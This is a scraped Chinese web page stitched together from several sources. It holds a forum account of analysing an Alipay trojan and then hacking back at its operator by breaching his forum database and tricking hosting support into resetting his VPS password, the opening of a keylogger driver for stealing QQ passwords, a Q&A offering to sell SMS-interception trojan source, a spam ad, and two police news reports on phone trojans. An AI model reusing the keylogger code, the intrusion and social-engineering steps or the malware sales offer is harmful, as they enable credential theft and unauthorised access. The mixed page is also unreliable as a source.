手机木马控制端源代码通讯录木马源代码

今晚遇到个木马牛..给我发了个支付宝木马,是想转我钱么。。。。
打开360..竟然说安全,在虚拟机打开,然后 netstat -an 竟然无...
用C32看了下...看不懂~
/promote.php
/cfg/getconf.php
发现一大堆url ,莫非是后台?
打开url 竟然是p2p ,然后用虚拟机给自己的另外一个支付宝转账一元,发现钱跑到别人那去了…….
经过Liyang基友的指点才得知,我分析错文件了,此木马是白加黑免杀手法。
(铁道游击队队长)&& |
15:35
为什么是p2p的网站,是因为你分析的文件错了~~
你看到那一堆文件其实大部分是安全的,只有stat.dll是木马,这是白加黑木马~
以下是我很久之前写的一小篇文章中的
  我们今天的重点讨论白加黑的技术。旧版本的金山网盾的浏览器首页锁定功能锁定的主页是通过读取一个配置文件得到的,而金锁木马把里面的内容改为某个特定的网址,而金山网盾在加载配置文件的时候并没有校验文件内容,于是就把被木马修改的网址锁定为主页。
  这就是一个木马病毒利用可信程序进行破坏的典型案例。这类病毒中可信程序一般被称为Loader,该类木马经常使用的Loader有老版本的好压和暴风影音等,病毒作者之所以选择它们作为病毒Loader,是因为它们在运行时会加载其对应的动态链接库,这个和DLL劫持又有相似之处。它们利用了Windows系统中加载DLL的一个特点。一个exe程序要加载DLL文件是在磁盘上搜索DLL文件,而不是按照指定路径加载。如果DLL文件被替换的话,可能会造成一定的问题,如犇牛病毒,软件目录下会出现大量的usp10.dll文件。
经过大牛的指点,总算明白点道理了。。。。。。
接下来轮到基友按耐不住基情了
&& |
16:58
里面的文件除了stat.dll以外都是正常文件,ppover.exe运行时会加载stat.dll,正常的stat.dll被替换成了病毒文件,stat.dll用Themida壳加密了,程序运行后会自动把所有文件复制到C:\Program Files\Windows Media Player\目录,ppover.exe复制到此目录名字wmplay.exe,创建启动项C:\Program Files\Windows Media Player\wmplay.exe。
stat.dll会创建mmc.exe为暂停状态,并且把病毒exe写入mmc的内存,然后修改mmc的执行入口,然后恢复执行mmc。我把这个病毒exe提取出来了,直接分析这个就行了,zip密码:test
/share/link?shareid=558947&uk=
于是 把马儿下载到虚拟机,打开,然后打开
转款给V基 1块钱
然后抓虚拟机的包,得到几个信息:
1.&&/ 是他收信地址.
2.&&我给别人转账的时候,他会弹出个
3.&&输入验证码,netstat -an 发现占用了一堆 127.0.0.1:2233 端口,拿本机做转发代理..
4.&&再者抓到个他的进钱接口的收款密码
接下来,该讲述下怎么得到他源码了..
得到他的IP和域名了,自然是whois一下顺便查下他的IP段是哪个IDC的~
经过一番名侦探柯南般的侦查,发现他的VPS竟然是在他大爷的 火网互联 租的~
好吧,火网互联我来了,先查了下社工库,没发现什么,然后百度发现他上过的网站和论坛,日下之,拿到数据库,又得到一个他的常用密码了,你说我人品是爆格了吧~!!!
但是我得先知道他在火网互联的用户名是多少,这该怎么办呢….
突然发现个好玩的功能~
人品爆格,一猜就中,用户名果断跟域名有关,大多数SB小白站长的习惯哈!!
密码果断就是他的常用密码哇………..&&多亏了 可爱得啦大仙基友帮忙,哈哈哈!
嗯,不错….发现好东西了
你说这感情好不好?反正我是感觉很棒,接下来该想想怎么进服务器了…..
控制面板的功能只有&&关闭VPS -&&开启VPS - 重装系统 三个主要功能
怎么办呢,身为许多白富美梦中情人的屌丝就想到了一个很棒的办法…
忽悠客服去
漫长的等待10分钟…………
10. 9. 8.7.6.5.4.3.2.1.0
十分钟到~叮铃铃,当然不是下课……是骚扰客服去!
为了给客服个好印象,当然得赞赞人家呐。。。。。
许多基友就开始想骂我了
总算客服帮我破解好密码了重置为:fireinter
马上连上服务器,打包源码,走人喽!!!
邪恶的完成鸟~
收尾篇:
第二天登陆他进钱账户一看,发现又有很多人受骗了。。。
在这里感谢:&&@ @ @ @ @ @ @ @ @ @ @可爱的啦大仙 对此次旅程的帮助,谢谢!
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& By: z7y
源码下载地址:【】 提取码:52ju
添加新回复
后才能参与评论.QQ2010木马源代码(*&Kernel£*原创)现在网上很多盗QQ的木马,发现都不管用得,顺便做了这只QQ木马,这里发布一部分核心的代码内核代码,用于记录QQ密码,此代码编译后可以在win2000到win7下正常运行,百分百能获取正确的QQ和密码, 用户太下面的代码,只能获取QQ和密码,不带邮件发送功能,和系统隐藏功能,主要是怕有些人哪去干坏事,所以我不发布完整版的代码, 以下驱动代码需要编译为 NTI0.SYS 文件放到 C:\\Windows\\system32\\目录下面,在编译后面的代码,为一个DLL,最自己在用C写一个控制台程序加载 编译后的DLL ,运行起打开QQ登录后,就会显示出QQ帐号和密码,本篇文章只供学习只用,请不要哪去做坏事,后果自负。#include&#include&#include&#define KEY_UP 1&#define KEY_DOWN 0#define LCONTROL ((USHORT)0x1D)&#define CAPS_LOCK ((USHORT)0x3A)unsigned char asciiTbl[]={0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps&|&&&&(第1/25页)浏览21次&|&&猜你喜欢:热门分享::&在此强烈推荐,我恢复朋友删除的聊天记录就是找他的,他的qq是。需要可以找他。他们专业查微信和QQ聊天记录,找回删除的聊天记录。信誉很好,非常专业。联系QQ:&哪里可以买到手机短信拦截木马源码?_百度知道
哪里可以买到手机短信拦截木马源码?
提问者采纳
you 短信,通话记录,通讯录,GPS定位,拦截获取,均可先行测试.
我想测试下,qq多少?
有得测试哦。给个采纳呗。
提问者评价
其他类似问题
为您推荐:
手机短信的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁高密警方破获“9.24”利用木马程序盗刷银行卡案
&&&&来源:&&&&
&&&&&&字号
人民网潍坊5月15日电& 银行卡没离身,密码账号也未泄露,但数万元钱却莫名奇妙的“蒸发”了。高密市警方历时5个多月,跨越大半个中国,网上网下同时作战,成功破获了一起利用网络黑客技术实施的系列盗窃案,揪出了隐藏在网络空间里“木马盗贼”,也揭开了网银被盗刷背后的“玄机”。
扑朔迷离 四万余元“蒸发”
高密市的李伟(化名)经营着一家五金商店。平时,他会通过手机短信来了解业内行情,每天能收到十几条相关信息。2014年9月,李伟觉得手机突然“安静”了,近两天没有收到任何短信。随后到银行查账时,让他更吃惊的是6张银行卡在19日至20日期间竟然有4万多元钱不翼而飞。惊慌失措的李伟立即跑到公安机关报了警。
李伟告诉民警,他的银行卡未曾离身,也并未转借他人,同时没有进行过任何网上交易或银行操作。经过民警提醒,李伟回忆起了不久前自己收到过的一条“可疑”短信,短信内容显示:“李伟老板您好,你所需要的某种产品我们这边有,详情您请点击这个链接”, 然后他没多想便点击了链接,但是并没有看到产品图片。了解到这一情况后,民警对李伟的手机进行了检验鉴定,结果很快出来,李伟的手机中了一种新型的木马病毒。民警发现这是一起利用黑客技术来攻击受害人手机程序,获取受害人信息,并且实施盗刷银行卡现金的案件。对此,高密市公安局领导高度重视,立即从网安大队、刑警大队抽调精干警力成立专案组,全力展开对这起案件的侦破工作。
抽丝剥茧 案情终现端倪
面对这起“虚拟空间”的犯罪,专案组决定兵分两路,一路是调查受害人银行卡资金流向,另一路是对被入侵手机的木马程序进行反编译,对信息流进行查询。但是刚开始侦查,民警就感到步履维艰,这种新型作案方式给办案民警带来了非常大的侦破难度。
在查询受害人的银行卡交易明细时,民警发现受害人银行卡上的4万多元现金两天内,以小额快捷支付的方式分多笔被转帐,资金去向为百付宝、网银在线、支付宝等快捷支付平台。这一起案件所涉及的支付平台有11个,涉及北京、济南、上海、杭州、广州等多个省市,而且有的转账可能仅仅是一块钱,走的支付平台、商城就达到三、四个,甚至还要多,最后这笔钱才能转到犯罪嫌疑人的银行卡上。为了反复核实一些线索信息,民警在北京一呆就是三个多星期,奔走于六家第三方支付平台,有的支付平台甚至要上门三、四趟。而另一路民警就在虚拟空间内开始了一场“无声却激烈”的战斗,一番智斗后,成功锁定了一个可疑的木马网站。
民警发现受害人被盗刷的钱多次辗转后被转账到了两个指定银行账户,后在南宁、宾阳等地取现。专案组在2015年元旦前夕奔赴2200多公里外的广西南宁市,在当地警方的配合下进行侦查,最终确定了两名犯罪嫌疑人,其中一名为直接作案人韦某,另一名为木马网站后台的管理员黄某。在掌握大量证据后,抓捕民警兵分两路,成功将韦某、黄某二人抓获。
柳暗花明 盗刷背后“大起底”
在大量证据面前,韦某、黄某很快便分别供认了自己的犯罪事实。现年35岁的黄某在一次酒局上,听闻朋友提起网上有“用木马病毒骗钱”这事,说者无心,听者有意,黄某便打起了这个骗钱的念头。2014年8月,黄某租赁了一台服务器,注册了域名,从网上购买木马病毒源代码,为了让自己的这款手机木马软件躲避杀毒软件的查杀,他还找人给木马病毒源代码做了免杀外壳。自觉万事具备后,黄某就开始了自己的“淘金路”,他通过QQ群、相关论坛,不断发布关于售卖网络病毒的广告,以每月3000元的价格卖给其他人。
黄某交待,从作案至今,他已经将此款木马病毒卖给了15个用户,非法获利6万余元。客户购买了木马病毒并付款后,黄某就在木马病毒网站上为该客户开通账号,凭借账号可以查看该中毒手机上的全部短信内容。值得注意的是,该木马病毒仅针对安卓系统的智能手机。这种木马病毒安装到手机后,能够让该手机接收不到任何短信,而诈骗犯罪嫌疑人利用木马病毒拦截被害人手机短信,获取银行向该手机号码发送的银行卡验证信息,然后就可以把银行卡内的钱消费掉。
嫌疑人韦某就是黄某的其中一个客户,他购买了病毒软件后,分三次购买了11张移动手机卡以及网络云盘,将木马病毒软件上传到云盘进行共享以获取链接网址。同时又通过企业平台网站购买了有关小企业主的姓名、手机号、银行卡号、身份证号等信息。然后就有针对性地通过向小企业主手机上发送带有该链接网址的诱导短信,引诱小企业主点击链接下载木马病毒并安装激活。一旦对方“上钩”,韦某就可以利用对方的银行卡进行小额快捷支付,实时查看银行向该手机号码发送的银行卡消费验证码信息,并快速将被害人银行卡内的钱消费掉,或者以四六分的形式通过银行卡盗刷团伙盗刷那些手机中木马病毒的受害人银行卡内的现金,再通过转账、提现、购买充值卡变现等形式,最后存入自己持有的一张银行黑卡内。
根除源头 斩断伸向网银的“黑手”
在审讯过程中警方发现,无论是该木马网站的管理员黄某,还是直接作案人韦某,都不具备制作木马病毒的能力。警方深知,手机木马程序易于隐藏,传播迅速危害巨大,如果只打击到直接作案者,忽略了木马病毒制作者、传播者及下线,将无法起到遏制手机木马犯罪行为的作用。为了根除犯罪源头,民警决定从木马程序源代码来源入手。专案组多次往返济南、北京、河南、上海、广东、南宁等地调查取证,逐渐摸清了这一犯罪团伙的组织架构。
黄某的木马源程序代码是从一个网名叫“该昵称不能为空”的人手中购买,警方确定了该嫌疑人是河南人李某。3月份,专案组马不停蹄地赶赴河南新乡,在当地公安机关的配合下,成功将嫌疑人李某抓获。李某供述,曾两次为黄某提供木马拦截程序源代码,并以元不等的价格受到黄某委托对其木马网站进行维护和升级。李某还应黄某要求为其制作了10086积分钓鱼网站,用以窃取受害人的银行卡的身份证号、账号、密码等“四大件”,以此来扩大“生意”。经过侦查,民警又发现了为黄某制作木马病毒免杀工具的嫌疑人是广东中山的梁某,并将其抓捕归案,在大量的证据面前,梁某也不得不承认自己的犯罪行为。
至此,警方已抓获黄某、韦某、李某、梁某等4名犯罪嫌疑人,扣押涉案电脑7台、手机17部、手机卡20张、银行密码器8个、车辆1辆。这起利用网络黑客技术盗取他人财物的盗窃案件成功告破,这一网络黑客盗窃团伙被摧毁。
在抓获这四名犯罪嫌疑人后,民警继续对该木马网站进行侦查。通过数据分析得知,自2014年8月份以来,该木马网站上象韦某一样的直接作案用户竟多达78个,目前在用账户31个。在网站后台中,他们已获取的受害人通讯录信息有43万余条,短信记录100余万条,而且已经被种植手机木马成功的用户有5650余人。目前警方还在对此案进一步调查,对这5650余名受害人进行询问,并且对其他78个木马网站用户继续进一步侦查。(赵光)
(责编:杨文鹏、王鑫福)
善意回帖,理性发言!
使用其他账号登录:
恭喜你,发表成功!
请牢记你的用户名:,密码:,立即进入修改密码。
s后自动返回
5s后自动返回
恭喜你,发表成功!
5s后自动返回
最新评论热门评论
鸢都聚焦|曝光监督
热门资讯|图说中国
热点栏目|环球博览
周游鸢都|潍坊人物
24小时排行&|&
人 民 网 版 权 所 有 ,未 经 书 面 授 权 禁 止 使 用
Copyright &
by .cn all rights reserved
人 民 网 版 权 所 有 ,未 经 书 面 授 权 禁 止 使 用
Copyright &
by .cn. all rights reserved三公司靠刷机给用户植“木马” 窃通讯录2000万条
来源:法制晚报
  三家公司相互配合,以安卓系统的水货智能手机为主要目标,向手机内偷装类似于木马程序的“静默插件”,之后利用插件“遥控”,偷装需要推广的软件,获取推广费用。
  公司高管及主要参与人员被抓获。据在案的技术人员供述,“静默插件”只在wifi环境下运行,用户难以察觉,且已经通过技术手段规避了杀毒软件的检测。
  经鉴定,“静默插件”还能获取用户手机位置,读写用户存储卡等信息,偷偷上传手机收发短信、通话信息、通讯录等个人信息。案发时,警方从公司查获非法获取的手机通讯录达近2000万条。
  被告人杨小慧告诉民警,被抓前,他曾想过利用手机通讯录,以机主的名义给其朋友发短信推广产品。
  日,朝阳法院一审以非法获取计算机信息系统数据、非法控制计算机信息系统罪,判处杨小慧等10人有期徒刑3年半至1年5个月的不等刑罚。
  案情揭秘 刷机之时安装软件赚推广费
  据杨小慧供述,2010年前后,他和陈新、罗真运、张炳合伙在深圳相继成立深圳万丰博通信息技术有限公司和安丰易连信息技术有限公司。两家公司是一班管理团队运营,杨是负责人。
  杨小慧说,安丰公司的主要业务是开发APP STORE业务,即“安丰下载”手机软件,年收入百万左右。“安丰下载”类似于“苹果软件商店”、“豌豆荚”那样的“软件商店”APP。
  “万丰公司是给水货手机刷机并安装软件的公司,主要业务是给水货手机提供ROM(操作系统)包,以及给&安丰下载&做推广。”杨小慧说,在深圳华强北街数码城内他们曾拥有提供刷机服务的手机柜台近10个,同时还有其他一起合作的手机柜台。
  所谓刷机,即给智能手机重新安装操作系统,使其功能得到完善,水货手机因操作系统不同,机主刷机需求更高。
  杨小慧说,他们会利用刷机的机会,将一些软件安装到手机中。具体操作模式是,“把广告商的推广软件,如广告、游戏、安卓应用等集成到ROM包,再将ROM包刷进安卓智能手机中,使用手机的用户如果点击广告商的推广软件,我们公司就可以获得推广费。”
  杨小慧说:“一般来说,给每部手机安装每个软件,能收1.5元。每次点击,公司还可以获得0.8元至3.5元不等的收益。刷一部手机,我们给手机柜台2至3元。”
  刷机对象主要包括三星、HTC手机
  陈新交代说,刷机的客户主要是销售各种品牌水货手机的批发商。此外,也有一些卖二手手机的贩子以及在淘宝上卖的贩子。
  “我们刷的都是安卓系统的手机。这些水货手机从香港过来,在深圳解锁、刷机,销往各地。”陈新说,“手机批发商找手机柜台刷机,主要目的是把水货手机的操作系统刷成中文的。”
  这一细节,也得到罗真运、杨小慧等人的证实,涉及的手机品牌,主要包括三星、HTC和WP(Windows Phone)。
  2011年,杨小慧成立北京麦德联合科技发展有限公司,负责“安丰下载”的运营、手机软件及广告的推广,张炳负责该公司商务和运营业务。
  据杨小慧交代,公司生意最好的时候,深圳的公司一天能刷机上万部。2012年,公司陆续把直接经营的手机柜台关闭,只让与公司有合作的手机柜台刷机,利润对半分。
  偷装插件wifi环境下运行
  杨小慧交代,2012年初,他和陈新、罗真运、张炳商量制作能够控制他人手机的“静默插件”。
  之所以称作“静默插件”,杨小慧向警方解释说:“装了它,手机就会与我们的服务器自动联系,自动下载并安装服务器所推广的软件及广告信息,整个过程手机用户是不知情的,用户也不知道插件安装在手机中。”
  案发后,北京通达首城司法鉴定所鉴定确认,“静默插件”具有在用户不知情的情况下,获取手机位置、手机网络状态、用户手机运行的应用软件列表的功能。
  杨小慧说,他们公司的服务器一台在香港特区,一台在美国,因为这两地的服务器“速度快、便宜,也不用域名备案”。
  技术人员林伟东说,当时陈新向自己提研发要求,“推送软件一定在wifi条件下运行,不要耗费手机用户的流量。不然,使用了用户的流量,客户会发现投诉的。”
  杨小慧说,木马插件的最初目的是通过服务器,向使用此插件的手机用户推送软件和广告以获得推广费。从2012年夏季开始,麦德公司给插件升级,加入了向服务器上传手机机主个人信息的功能。
  北京通达首城司法鉴定所鉴定确认,“静默插件”能更改用户网络状态,删除用户手机内安装的应用软件,安装其他应用软件,访问互联网,强制关闭正在运行的应用软件,唤醒用户手机,读写用户存储卡等信息,上传手机收发短信、通话信息、通讯录以及GPS定位信息。
  杨小慧对办案人员说,他知道这是触犯法律的行为,但是,“市场上有人在做这个,我们不做太亏了。”
  只涉安卓“苹果版”插件研发失败
  经法院查明,黄光侠、马庆沐、吴浩、林伟东是在杨小慧等人授意下研发“静默插件”的技术人员。
  黄光侠、马庆沐等技术人员供述,“静默插件”专门针对安卓系统智能手机。黄光侠说,“杨小慧曾提出制作一款能在苹果手机上使用的&静默插件&,但研发失败了。”
  马庆沐参与了整个犯罪过程,据其供述,“静默插件”面世后进行过多次升级,一共有五个版本。
  据他交代,第一个版本,只是在ROM包里植入“静默插件”,待手机用户联网时自动运行。
  马庆沐说,第一版面世后,杨小慧、陈新、张炳、林伟东和他一起开会对版本进行改进,杨小慧提出,“静默插件”需要能够获取手机用户的信息。
  麦德公司的技术总监吴浩说,他参与过这款插件的升级工作,使得手机能够接收到后台推送的软件,获取手机型号、通讯录、地理位置、本机号码、IMEI等信息。
  马庆沐告诉民警,2013年4月,“静默插件”被手机用户安装的杀毒软件列为恶意软件,并提示手机用户该软件系在用户不知情的情况下下载安装的。
  他说,之后杨小慧、黄光侠和他专门开会研究解决这个问题,黄光侠提出可以使用C语言编写程序,这样就能避开杀毒软件监测了。
  一个月后,黄光侠用C语言编辑了一段程序,集成到“静默插件”中,将软件升级到第五版。
  客户众多每天要推送十个软件
  有了这款“静默插件”,除了利用“安丰下载”推广软件获利外,杨小慧公司还形成了“线上静默推送”和“线下刷机内置软件”两种运营方式。
  “在线下,麦德公司运营部从第三方(软件推广商)拿来应用程序,找手机柜台刷机,将程序安装进去;另一种是线上,由技术部门把做好的&静默插件&交给手机柜台安装在刷机的手机里,通过后台操作,在用户不知情的情况下推送第三方软件。”马庆沐说。
  办案人员查明,“静默插件”诞生后,麦德公司运营部门的祝春娟、杜雪梅在主管张炳等人的安排下,从软件商处接单,然后登录公司服务器后台,推送第三方软件包,进行后台操控。
  张炳交代,有公司找到他们推广软件,就由他来谈,如推广什么软件、如何收费等。
  祝春娟交代,“软件公司会给我发新研发的软件,我接到软件包后发给技术部门。”
  负责推送的杜雪梅供述:“我登录后台,把合作商发给祝春娟的软件包上传到后台,向被&控制&的手机用户偷偷推送(安装)我们需要推广的广告和软件。”
  侦查人员从张炳的QQ聊天记录中发现,聊到被控制的手机用户时张炳对陈新说,“我们等于控制了一大批&肉鸡&(指被木马软件控制的电脑或智能手机)。”
  张炳供述,他们推送的软件有上百个,平均向每个手机用户推送10个软件,推送一个软件就有几毛到两三元的利润,共获利上百万元。
  部分软件商明确要求“静默推送”
  据杨小慧供述,公司推广软件,与合作商都签有协议,“他们有些知道我们在使用&静默插件&做推广,有的明确提出这种要求,但有些不知道。”
  杜雪梅也交代:“和我们合作的,部分人是知道我们用这种手法的,并提出明确要求。他们需要在短时间内大量提升使用量。”
  杜雪梅告诉民警,很多客户委托“安丰下载”做软件推广。麦德公司利用“安丰下载”进行市场推广过程中,为了增加返利,也存在主动使用“静默插件”推送的情况。
  勘查发现近2000万通讯录被获取
  日常工作中,北京警方发现,2012年10月以来,大量手机内的近千万条个人信息上传到位于美国的服务器,位于北京市朝阳区运众大厦的落地IP登录该服务器非法获取了大量信息。
  根据这一线索,2013年8月至9月,警方将杨小慧等10人抓获。
  公安机关对涉案公司网站数据库进行勘查,发现该公司有大量用户移动终端内的信息。
  公安机关对祝春娟电脑文件勘查确认:从4份静默安装收入统计表格中,可分析出公司3月到7月初通过静默安装的手机应用32个。
  被非法获取的机主个人信息汇总
  被获取通讯录的移动终端102368部被获取的通讯录条
  被获取手机号码的移动终端44564部被获取手机型号的移动终端265970部被获取地址信息的移动终端132168部被获取软件安装列表的移动终端196733部被获取IMEI的移动终端265991部
  被获取IMSI的移动终端206806部
  IMSI:国际移动用户识别码,可据此识别移动用户所属国家、归属的移动通信网IMEI:国际移动设备识别码,是手机的唯一识别码
  公司负责人:欲以机主名义发推广短信
  马庆沐说,获取IMEI,可以统计推送软件的用户量,与软件商结账;获取手机用户的软件列表,是为了统计用户喜欢什么软件。
  杨小慧告诉民警,获取位置信息,是为了在特定区域做推广;获取机主通讯录的号码,是想以机主的名义给其朋友发短信推广产品,但还没实际操作过。至于其他个人信息,他表示还没想好怎么利用。
  杨小慧承认:“这些个人信息如果被别有用心的人得到的话,后果不堪设想。”
  法院审理 10被告人获刑3年半至1年5个月
  日,朝阳检察院将此案向朝阳法院提起公诉。
  朝阳法院审理后认为,杨小慧、陈新、罗真运、张炳以营利为目的,授意技术人员马庆沐、林伟东、吴浩、黄光侠研发升级“静默插件”,安排祝春娟、杜雪梅通过后台服务端操控的方式向植入“静默插件”的移动终端推送软件、广告等商业性电子信息,从而非法获取计算机信息系统数据,实现对计算机信息系统的非法控制,均已构成非法获取计算机信息系统数据、非法控制计算机信息系统罪。
  日,朝阳法院以上述罪名判处杨小慧有期徒刑3年6个月,罚金5万元;其他被告人分别被判有期徒刑3年至1年5个月不等,罚金3万元至1万元不等。
  行业影响 首例案件具有重要警示作用
  目前,利用技术手段非法获取手机用户个人信息,已成为社会关注点,相关事件也被媒体多次曝光。记者走访北京多家法院了解到,此次,是本市法院首次对相关人员追究刑事责任。
  中国互联网协会研究中心秘书长、中国计算机学会法律顾问胡钢律师表示,以往,类似问题多在不正当竞争或反垄断的民事案例中出现。不正当竞争或反垄断的民事诉讼,仅针对特定经营者作为当事人,忽略了广大消费者的权益保护。
  胡刚认为,本案的判决,对于类似的经营行为具有重要的警示和规范作用,清晰规划出一条法律红线,使移动互联网向更加注重用户隐私和数据安全的方向迈进。
  法晚提醒刷机问题多“越狱”要谨慎
  如何发现、防范手机被植入类似“静默插件”的非法插件?
  杨小慧曾“提醒”办案民警,“不买水货手机,不&越狱&,就能避免不良软件植入。同时,不要去手机摊刷机,应去官方的客服刷机,刷官方的ROM包。”
  中国信息安全测评中心总工程师王军告诉《法制晚报》记者,目前手机软件安全可控性还有很多不足,一般手机用户想要发现这种恶意插件有一定难度,可以借助一些安全软件的帮助,但难以保证能发现所有恶意插件。
  从防止角度,王军建议,尽量选择正规渠道的应用(APP),对刷机或“越狱”类的操作更要小心。
(责任编辑:UN654)
&&&&&&</div
爆炸点距居民楼距离有更严格的测算方法[]
数字之道:
搜狐民调:
主演:黄晓明/陈乔恩/乔任梁/谢君豪/吕佳容/戚迹
主演:陈晓/陈妍希/张馨予/杨明娜/毛晓彤/孙耀琦
主演:陈键锋/李依晓/张迪/郑亦桐/张明明/何彦霓
主演:尚格?云顿/乔?弗拉尼甘/Bianca Bree
主演:艾斯?库珀/ 查宁?塔图姆/ 乔纳?希尔
baby14岁写真曝光
李冰冰向成龙撒娇争宠
李湘遭闺蜜曝光旧爱
美女模特教老板走秀
曝搬砖男神奇葩择偶观
柳岩被迫成赚钱工具
大屁小P虐心恋
匆匆那年大结局
乔杉遭粉丝骚扰
男闺蜜的尴尬初夜
社区热帖推荐
波兰宅男终于实现梦想……[]
客服热线:86-10-
客服邮箱:

我要回帖

更多关于 java通讯录源代码 的文章

 

随机推荐